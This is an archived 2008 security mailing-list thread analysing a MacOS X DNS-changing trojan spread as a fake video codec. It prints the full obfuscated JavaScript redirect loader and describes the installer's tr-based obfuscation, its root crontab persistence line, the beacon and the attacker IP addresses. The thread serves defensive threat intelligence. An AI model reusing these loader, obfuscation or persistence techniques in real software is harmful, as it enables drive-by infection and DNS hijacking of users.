[nsp-sec] [ OT ] MacOS X malware

Rob Thomas robt at cymru.com
Wed Apr 2 16:19:31 EDT 2008 

Thanks, Brian!

Wise call on the null routing.  Must...avoid...altering...the DDoS-RS...  ;)


Brian Eckman wrote:
> Rob,
> 
> I'm sure this isn't news to you, but it might help clarify things for 
> others. This is the Mac equivalent of Zlob (aka generically as 
> DNSChanger). The two DNS servers given to infected hosts will be within 
> the 85.255.112.0/20 network - I think almost always within 
> 85.255.112.0/22. Based on my observations, I'd guarantee there are over 
> 229 infected Macs in Minnesota alone, not to mention 50x that in Windows 
> boxes.
> 
> I've heard other rumors (besides the livejournal link you provided) that 
> RBN is involved with Zlob, but I've never heard more than highly 
> speculative comments. Regardless, the folks behind this line of malware 
> are clearly very well funded and well organized. It's getting disgusting 
> how long this line of malware has been around and how many *millions*[1] 
> of hosts have been infected, and yet there is little to no press 
> attention given to it (and who knows how much/little LE attention). They 
> own a massive number of domains, generate a huge quantity of malware, 
> make millions off of numerous bogus anti-spyware programs (almost 
> certainly created in house) as well as large commissions from some 
> gray-ish anti-spyware, and historically, even commissions from affiliate 
> networks such as (but not limited to) amazon.com's "Associates" program.
> 
> We have been null routing 85.255.112.0/20 for nearly two years now, as 
> well as some other Intercage IP space.
> 
> Cheers,
> Brian
> 
> [1] 
> http://blogs.technet.com/antimalware/archive/2007/09/20/storm-drain.aspx 
> provides some reference as to how big the Zlob problem is. One week 
> after the Sept, 2007 MSRT was released, the Zlob family had been removed 
> from 664,258 machines. This was the same month MSRT first got rid of 
> Storm; that was removed from 274,372 machines in the same time period. 
> Granted, Zlob had about a two year head start... (But I wonder how many 
> infected machines had already been cleaned/reinstalled/recycled by then?)
> 
> Rob Thomas wrote:
>> ----------- nsp-security Confidential --------
>>
>> Hi, team.
>>
>> Given the large number of Mac users in this community, and given that 
>> this collection of dodgy web sites are infecting Windows and MacOS X, 
>> I thought this was reasonably appropriate for this list.  Some folks 
>> on this list might want to take action against some of these IPs.
>>
>> Yes it's true - there is malware for the MacOS X platform.  While this
>> report will cover a recent release, the malware itself isn't new and
>> hacking MacOS X isn't new, either.
>>
>> You can read a public blog post and some useful follow-ups at the
>> following URL:
>>
>>     <http://tacit.livejournal.com/238112.html>
>>
>> Here is our analysis.  Some of these links are rude even in name, and
>> all of them are unsafe.
>>
>> The fun begins with at least one porn site.  The site brings the user
>> through a few redirects to a site here:
>>
>>     88.85.72.147
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     35415   | 88.85.72.147     | 88.85.64.0/19       | NL | ripencc  |
>> 2006-02-08 | WEBAZILLA WebaZilla European Network
>>
>> The page there loads some fun Javascript:
>>
>>     var str=["332", "331", "331", "331", "440", "419", "436",
>>     "354", "434", "433", "440", "383", "370", "381", "332",
>>     "331", "331", "331", "424", "439", "432", "421", "438",
>>     "427", "433", "432", "354", "443", "441", "439", "427",
>>     "422", "420", "430", "444", "433", "427", "362", "435",
>>     "439", "423", "436", "443", "363", "445", "332", "331",
>>     "331", "331", "331", "441", "427", "432", "422", "433",
>>     "441", "368", "430", "433", "421", "419", "438", "427",
>>     "433", "432", "383", "361", "426", "438", "438", "434",
>>     "380", "369", "369", "430", "419", "432", "422", "427",
>>     "432", "425", "426", "419", "430", "430", "368", "421",
>>     "433", "431", "369", "427", "432", "368", "421", "425",
>>     "427", "385", "373", "361", "381", "332", "331", "331",
>>     "331", "447"];
>>     var temp='';
>>     var gg='';
>>     for (i=0; i<str.length; i++){
>>        gg=str[i]-322;
>>        temp=temp+String.fromCharCode(gg);
>>     }
>>     eval(temp);
>>
>> This translates to (I've heavily obfuscated the URL below):
>>
>>     var pov=0;
>>     function ywuidblzoi(query){
>>        window.location='h x x p : / / landinghall . com / in.cgi?3';
>>     }
>>
>> The host landinghall.com resolves to 88.214.202.180, located at the
>> following provider:
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     23393   | 88.214.202.180   | 88.214.192.0/18     | GB | ripencc  |
>> 2006-01-18 | ISPRIME - ISPrime, Inc.
>>
>> In addition to the malware, the images are extremely graphic.  
>> Consider yourself warned.
>>
>> The web site determines the visitor's OS and then decides which malware
>> to offer.  This is masked as a video codec to play the porn
>> available on this "PornTube" (their name) site.
>>
>> Note well that if the browser has pop-ups blocked, there is no risk to
>> MacOS X users so far as we can discern.
>>
>> At this point the MacOS X user is prompted to download a disk image for
>> installation.  This image is named 1023.dmg and is served from:
>>
>>     64.28.178.27, 64-28-178-27-rev.cernel.net
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     27595   | 64.28.178.27     | 64.28.176.0/20      | US | arin     |
>> 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The MacOS X user *must* provide his or her password to enable the
>> installation of this malware masked as a video player.  This is not a
>> 0day attack - it is social engineering.
>>
>> The preinstall and preupgrade scripts are the same and contain 25 lines.
>> Both use an interesting obfuscation technique - the Unix tr(1) command.
>>
>> The script first cat(1)'s itself and pipes bottom 23 lines of itself
>> through tr(1).  The first tr(1) round does the following (I've cleaned
>> this up a bit to make it more legible):
>>
>>     tr vdehrujzpbqafwtgkxyilcnos upxmfqrzibdanwgkethlcyosv > 1
>>
>> It next sets two variables:
>>
>>     s1 = cx.zxx.aas.xd
>>     s2 = cx.zxx.aaz.ace
>>
>> The script called "1" is now run with these two variables as arguments,
>> piped through tr(1) again (line split to make it more legible):
>>
>>     sh 1 `echo $s1|tr qazwsxedcr 0123456789` \
>>     `echo $s2| tr qazwsxedcr 0123456789`
>>
>> The tr(1) command translates those two "strings" into the following two
>> IP addresses:
>>
>>     s1 = 85.255.114.57
>>     s2 = 85.255.112.186
>>
>> Those IPs belong to:
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     27595   | 85.255.114.57    | 85.255.114.0/23     | UA | ripencc  |
>> 2005-06-16 | INTERCAGE - InterCage, Inc.
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     36445   | 85.255.112.186   | 85.255.112.0/24     | UA | ripencc  |
>> 2005-06-16 | CERNEL-ASN - Cernel, Inc
>>
>> The script called "1" looks for some basic IPv4 settings on the Mac.
>> It then replaces the DNS name servers in the netinfo database with
>> 85.255.114.57 and 85.255.112.186.  Any DNS queries from the compromised
>> Mac are now sent to these two name servers.
>>
>> Both 85.255.114.57 and 85.255.112.186 are open to recursion, of course.
>>
>> These IPs are no stranger to badness.  We count 17 distinct samples in
>> our malware menagerie that reference 85.255.114.57.  The host at
>> 85.255.112.186 has been involved with at least 60 malware samples that
>> hijack DNS settings.
>>
>> If a query is made for a non-existant DNS RR, these DNS name servers
>> return an answer of 64.28.185.108.
>>
>>     64.28.185.108, 64-28-185-108-rev.cernel.net
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     27595   | 64.28.185.108    | 64.28.176.0/20      | US | arin     |
>> 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> The script then installs itself into root's crontab as:
>>
>>     * * * * * /Library/Internet Plug-Ins/QuickTime.xpt\">/dev/null 2>&1"
>>
>> By default there is no root crontab on MacOS X, so this one really
>> stands out.
>>
>> The QuickTime.xpt script is just a copy of the "1" script.  This will
>> now run once per minute, as root, ensuring the malware and the DNS
>> changes aren't removed or lost for long.
>>
>> A Perl script named "sendreq" is run and deleted.  This script is a
>> beacon, sending the output of "uname -p" (the machine processor
>> architecture name, e.g. "i386") and the hostname(1) command to a web
>> server.  The web server is:
>>
>>     64.28.188.220, 64-28-188-220-rev.cernel.net
>>
>>     AS      | IP               | BGP Prefix          | CC | Registry |
>> Allocated  | AS Name
>>     27595   | 64.28.188.220    | 64.28.176.0/20      | US | arin     |
>> 2005-12-29 | INTERCAGE - InterCage, Inc.
>>
>> This is done as a HTTP GET command from the compromised Mac, with the
>> Accept-Language: field set to the information obtained from the
>> uname(1) and hostname(1) commands run on the compromised Mac.
>>
>> We see at least 227 victims, mostly in the US.
>>
>> Thanks,
>> Rob.

-- 
Rob Thomas
Team Cymru
The WHO and WHY team
http://www.team-cymru.org/

More information about the nsp-security mailing list